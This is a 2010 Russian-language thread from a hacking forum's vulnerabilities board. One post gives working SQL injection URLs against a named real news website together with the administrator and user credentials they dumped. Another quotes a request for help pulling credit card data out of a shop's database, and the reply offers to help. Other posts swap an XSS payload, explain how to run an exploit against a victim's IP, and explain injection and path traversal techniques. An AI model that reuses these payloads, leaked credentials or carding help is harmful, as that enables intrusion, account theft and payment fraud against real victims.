HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 10.01.2010, 14:44
S00pY
Познающий
Регистрация: 24.04.2007
Сообщений: 92
С нами: 10025299

Репутация: 412
По умолчанию

В cmd выдает: usage 1.exe <target_ip>
Ну запусти сплойт с параметром "<target_ip>" - это ip адрес жертвы
example:1.exe 192.168.0.1
Зы:Самого сплойта я не видел и насчет МС незнаю
 
Ответить с цитированием

  #2  
Старый 10.01.2010, 15:21
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

2 Gidz
http://www.asianewsnet.net/news.php?id=6+UNION+SELECT+1,2,3,4,5,6,7,8,9,UserN ame,11,12,13,14,15,Password,17,18,19,20,21,22,23,2 4+from+tuser+limit+1,1--
administrator:0641
http://www.asianewsnet.net/news.php?id=6+UNION+SELECT+1,2,3,4,5,6,7,8,9,UserN ame,11,12,13,14,15,Password,17,18,19,20,21,22,23,2 4+from+tuser+limit+2,1--
admin123:admin123

http://www.asianewsnet.net/news.php?id=6+UNION+SELECT+1,2,3,4,5,6,7,8,9,UserN ame,11,12,13,14,15,Password,17,18,19,20,21,22,23,2 4+from+tuser+limit+3,1--
ann:bkk1854
И так далее и тому подобное...
 
Ответить с цитированием

  #3  
Старый 10.01.2010, 16:32
Darren
Banned
Регистрация: 14.06.2008
Сообщений: 34
С нами: 9424793

Репутация: 13
По умолчанию

delete

Последний раз редактировалось Darren; 19.02.2010 в 23:27..
 
Ответить с цитированием

  #4  
Старый 10.01.2010, 19:49
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
С нами: 10226672

Репутация: 441
По умолчанию

Цитата:
Сообщение от Darren  
у меня есть к sql шопа. Как подключиться к базе для слива сс?
"DB_HOST" =>
"DB_NAME" =>
"DB_USER" =>
"DB_PWD" =>
Скидывай сюда переменные с полными занченями..мы попробуем сообразить как подключится.
 
Ответить с цитированием

  #5  
Старый 10.01.2010, 19:37
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

а xss потенциальная случайно нигде в ссылку (кликабельную) не попадает?
 
Ответить с цитированием

  #6  
Старый 10.01.2010, 19:41
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
С нами: 10018169

Репутация: 1680


По умолчанию

Цитата:
Сообщение от Pashkela  
а xss потенциальная случайно нигде в ссылку (кликабельную) не попадает?
Неа, итоговый код оказываетя потом в такой конструкции:
Код:
<td  bgcolor="white"><font color="#000000"><BODY ONLOAD=alert('lol')>ASS</font></td>
 
Ответить с цитированием

  #7  
Старый 10.01.2010, 20:08
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

2 Nightmarе:

<td bgcolor="white"><font color="#000000"><BODY ONLOAD=javascript:alert()>ASS</font></td>

только что проверил в последних OPERA, IE, в FF не запахало почему-то

Последний раз редактировалось Pashkela; 10.01.2010 в 20:10..
 
Ответить с цитированием

  #8  
Старый 10.01.2010, 20:12
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
С нами: 10018169

Репутация: 1680


По умолчанию

Цитата:
Сообщение от Pashkela  
2 Nightmarе:

<td bgcolor="white"><font color="#000000"><BODY ONLOAD=javascript:alert()>ASS</font></td>

только что проверил в последних OPERA, IE, в FF не запахало почему-то
И что это мне даст?
В моём примере такой же алерт был рабочий, то что его можно вывести я так-же в курсе.
 
Ответить с цитированием

  #9  
Старый 10.01.2010, 23:08
B1t.exe
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
С нами: 10268804

Репутация: 208


По умолчанию

ребята, у меня 3 вопроса вот уже долго инетресуеют, но думал со временем пойму, но не смог )

1. Как понять запрос: and 1=0, или or 1=1
2. когда запрос начинается с ?id=-11+union.... - это значит именно этот - (минус) в начале ?
3. часто, или постоянно в инексиях замечаю такое:
select+1,2,3,4,5,6,7,8,9,10,11,12.. или такое: /../../../../../
можете обяснить что это значит и от чего зависит длина т.е. откуда берется эти цифры.
 
Ответить с цитированием

  #10  
Старый 10.01.2010, 23:16
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
С нами: 9510146

Репутация: 1550


По умолчанию

Цитата:
Сообщение от B1t.exe  
ребята, у меня 3 вопроса вот уже долго инетресуеют, но думал со временем пойму, но не смог )

1. Как понять запрос: and 1=0, или or 1=1
2. когда запрос начинается с ?id=-11+union.... - это значит именно этот - (минус) в начале ?
3. часто, или постоянно в инексиях замечаю такое:
select+1,2,3,4,5,6,7,8,9,10,11,12.. или такое: /../../../../../
можете обяснить что это значит и от чего зависит длина т.е. откуда берется эти цифры.
Для кого статьи придумали?
1. 1 никогда не 0, условие не выполняется, нужно для скуль
0 равно 0, выполняется, также ноебходмо
2. минус ставится, чтобы в Бд не было такого айди дабы выводились видимые поля
3. цифры - для поиска выводимых полей. ../ - для инклуда файлов, пднятие по каталогам


Вообще, почитай статьи
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.